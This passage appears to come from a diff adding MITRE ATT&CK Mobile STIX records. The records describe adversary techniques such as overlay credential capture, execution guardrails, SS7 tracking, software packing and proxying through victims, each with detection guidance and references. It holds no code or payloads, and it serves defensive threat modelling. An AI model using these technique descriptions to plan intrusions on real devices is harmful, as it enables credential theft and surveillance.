Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:26.317Z", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). 
While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Users can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially permissions or API calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "created": "2022-03-30T20:31:16.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1627", + "external_id": "T1627" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:51.676Z", + "name": "GUI Input Capture", + "description": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)\n\nThere are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) \n\nAdditionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. 
Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:\n\n* Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Android users can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \n\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "created": "2022-04-05T19:48:31.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417/002", + "external_id": "T1417.002" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf" + }, + { + "source_name": "Android Background", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.", + "url": "https://developer.android.com/guide/components/activities/background-starts" + }, + { + "source_name": "Cloak and Dagger", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.", + "url": "http://cloak-and-dagger.org/" + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.", + "url": "https://www.group-ib.com/blog/gustuff" + }, + { + "source_name": "eset-finance", + "description": "Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. 
Retrieved September 24, 2018.", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/" + }, + { + "source_name": "Hassell-ExploitingAndroid", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019.", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf" + }, + { + "source_name": "XDA Bubbles", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/" + }, + { + "source_name": "NowSecure Android Overlay", + "description": "Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/" + }, + { + "source_name": "ThreatFabric Cerberus", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + }, + { + "source_name": "Skycure-Accessibility", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. 
Retrieved December 21, 2016.", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "external_id": "APP-31" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "created": "2017-10-25T14:48:11.535Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1432", + "url": "https://attack.mitre.org/techniques/T1432" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.", + "modified": "2022-04-01T13:19:41.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Contact List", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access contact list information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": 
false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:20:11.752Z", + "name": "Compromise Client Software Binary", + "description": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators. \n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. 
Application vetting services could detect applications trying to modify files in protected parts of the operating system.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "created": "2022-03-30T19:53:27.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1645", + "external_id": "T1645" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:40.501Z", + "name": "Software Packing", + "description": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. \n\nUtilities used to perform software packing are called packers. An example packer is FTT. 
A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "created": "2022-03-30T19:20:37.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1406/002", + "external_id": "T1406.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac", + "type": "attack-pattern", + "created": "2017-10-25T14:48:16.288Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1445", + "external_id": "T1445" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Abuse of iOS Enterprise App Signing Key", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + 
"x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5", + "created": "2017-10-25T14:48:09.864Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1450", + "url": "https://attack.mitre.org/techniques/T1450" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-38" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)", + "modified": "2022-04-05T19:54:12.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Track Device Location", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "created": "2020-04-28T14:35:37.309Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1575", + "url": "https://attack.mitre.org/techniques/T1575" + }, + { + "source_name": "Google NDK Getting Started", + "url": "https://developer.android.com/ndk/guides", + "description": "Google. (2019, December 27). Getting Started with the NDK. 
Retrieved April 28, 2020." + }, + { + "source_name": "MITRE App Vetting Effectiveness", + "url": "https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf", + "description": "M. Peck, C. Northern. (2016, August 22). Analyzing the Effectiveness of App Vetting Tools in the Enterprise. Retrieved April 28, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.\n\nThe NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)\n\nAdversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)", + "modified": "2022-04-08T15:46:24.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Native API", + "x_mitre_detection": "This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1476", + "url": "https://attack.mitre.org/techniques/T1476" + }, + { + "source_name": "IBTimes-ThirdParty", + "url": "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861", + "description": "A Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018." + }, + { + "source_name": "TrendMicro-RootingMalware", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/", + "description": "Jordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "TrendMicro-FlappyBird", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/", + "description": "Veo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-9" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-13" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-21" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. 
SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nSome Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)", + "modified": "2022-04-06T15:41:16.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deliver Malicious App via Other Means", + "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution may be able to identify the presence of apps installed from sources other than an authorized app store. \n* An EMM/MDM or mobile threat defense solution may be able to identify Android devices configured to allow apps to be installed from \"Unknown Sources\".\n* Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067", + "created": "2017-10-25T14:48:07.827Z", + "x_mitre_version": "1.0", + "external_references": [ + { + 
"source_name": "mitre-attack", + "external_id": "T1469", + "url": "https://attack.mitre.org/techniques/T1469" + }, + { + "source_name": "Honan-Hacking", + "url": "https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/", + "description": "Mat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).", + "modified": "2022-04-06T15:54:28.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Wipe Data Without Authorization", + "x_mitre_detection": "Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:14.285Z", + "name": "Proxy Through Victim", + "description": "Adversaries may use a compromised device as a proxy server to the Internet. 
By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)\n\nThe most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the `Proxy` API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "created": "2020-11-30T14:26:07.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1604", + "external_id": "T1604" + }, + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "created": "2019-09-23T13:11:43.694Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1520", + "url": "https://attack.mitre.org/techniques/T1520" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T20:03:46.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. 
